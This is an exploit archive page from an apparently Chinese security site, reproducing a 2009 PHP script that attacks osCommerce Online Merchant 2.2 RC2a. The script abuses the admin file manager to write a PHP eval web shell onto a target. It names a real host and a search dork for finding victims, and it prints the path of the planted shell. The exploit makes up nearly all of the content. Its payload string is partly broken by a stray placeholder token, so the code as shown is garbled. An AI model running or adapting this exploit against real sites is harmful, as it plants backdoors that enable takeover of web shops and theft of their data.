首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
osCommerce Online Merchant version 2.2 RC2a code execution exploit
来源:http://www.wolvez.org 作者:Flyh4t 发布时间:2009-09-02  
<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='democn.51osc.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\
___FCKpd___0
POST[aifly]);?>"; $message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n"; $message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $message.="Accept-Language: zh-cn\r\n"; $message.="Content-Type: application/x-www-form-urlencoded\r\n"; $message.="Accept-Encoding: gzip, deflate\r\n"; $message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $message.="Host: $host\r\n"; $message.="Content-Length: ".strlen($shellcode)."\r\n"; $message.="Connection: Close\r\n\r\n"; $message.=$shellcode; $fd = fsockopen($host,'80'); if(!$fd) { echo '[~]No response from'.$host; die; } fputs($fd,$message); echo ("[+]Go to see U webshell : $host/fly.php"); ?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nokia Multimedia Player versio
·Linux Kernel < 2.6.19 udp_send
·SmartVmd Active-X version 1.3
·Linux Kernel < 2.6.19 udp_send
·SmartVmd Active-X version 1.3
·Discuz! Plugin JiangHu <= 1.1
·Unsniff Network Analyzer versi
·Microsoft IIS versions 5 and 6
·dTunes 2.72 (Filename Processi
·Adobe Acrobat/Reader < 7.1.1/8
·akPlayer 1.9.0 (.plt File) Uni
·Hamster Audio Player 0.3a (Ass
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved